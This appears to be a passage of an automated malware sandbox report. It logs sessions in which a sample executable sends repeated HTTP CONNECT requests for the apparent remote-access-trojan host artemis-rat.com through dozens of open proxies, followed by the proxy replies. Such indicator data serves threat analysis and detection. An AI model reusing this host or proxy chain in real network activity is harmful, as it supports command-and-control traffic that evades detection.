                                                                                                                                                                                                                                                            721192.168.2.551303178.94.231.9331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.472105980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.097388029 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            722192.168.2.551710117.160.250.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.473582029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.108141899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064898014 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.934864998 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            723192.168.2.54974794.231.199.22619713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.473608971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490453005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514637947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.025557995 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            724192.168.2.551912171.235.166.22240193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.479670048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.895592928 CET39INHTTP/1.0 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.939320087 CET253INHTTP/1.0 500 Internal Error
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Error</title></head><body><h2>500 Internal Error</h2><h3>Internal proxy error during processing your request</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            725192.168.2.55207938.54.95.1990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480660915 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.703011990 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.843003035 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.186225891 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.839272976 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.213911057 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.970248938 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:25.725948095 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:08.734045029 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            726192.168.2.549759212.154.82.5290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480725050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490422964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514622927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.641412973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.312625885 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            727192.168.2.552025121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480792999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            728192.168.2.552036146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.481528997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            729192.168.2.551998114.132.202.24680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.482682943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.035099983 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            730192.168.2.55214252.35.240.11910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.484087944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.892859936 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            731192.168.2.55202691.107.180.250803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.484090090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.792809963 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            732192.168.2.55203058.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485212088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            733192.168.2.552011120.76.42.20988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.486428022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            734192.168.2.55204858.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488076925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            735192.168.2.552165104.17.9.114803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488079071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.642817974 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            736192.168.2.552154162.241.158.204467833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488945961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            737192.168.2.552199104.27.122.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.489140034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.643428087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
738 | 192.168.2.5 | 52109 | 82.113.157.122 | 31280 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.489145994 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
739 | 192.168.2.5 | 52073 | 185.104.63.57 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.489782095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.201930046 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.202281952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.201984882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:07.900358915 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:08.928154945 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:11.999728918 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:18.143877029 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:30.176146984 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:54.240824938 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
740 | 192.168.2.5 | 51966 | 20.219.182.59 | 3129 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.491908073 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:40.894234896 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
741 | 192.168.2.5 | 52102 | 195.248.243.149 | 7237 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.494740963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.201900005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
742 | 192.168.2.5 | 52111 | 38.242.199.111 | 37293 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.497497082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.139208078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.108282089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.939491034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.572624922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.214389086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.905148029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.115803957 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
743 | 192.168.2.5 | 52223 | 172.67.181.20 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.505565882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.659964085 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
744 | 192.168.2.5 | 52224 | 104.16.107.142 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.506843090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.661190033 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            745192.168.2.55208279.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507128000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
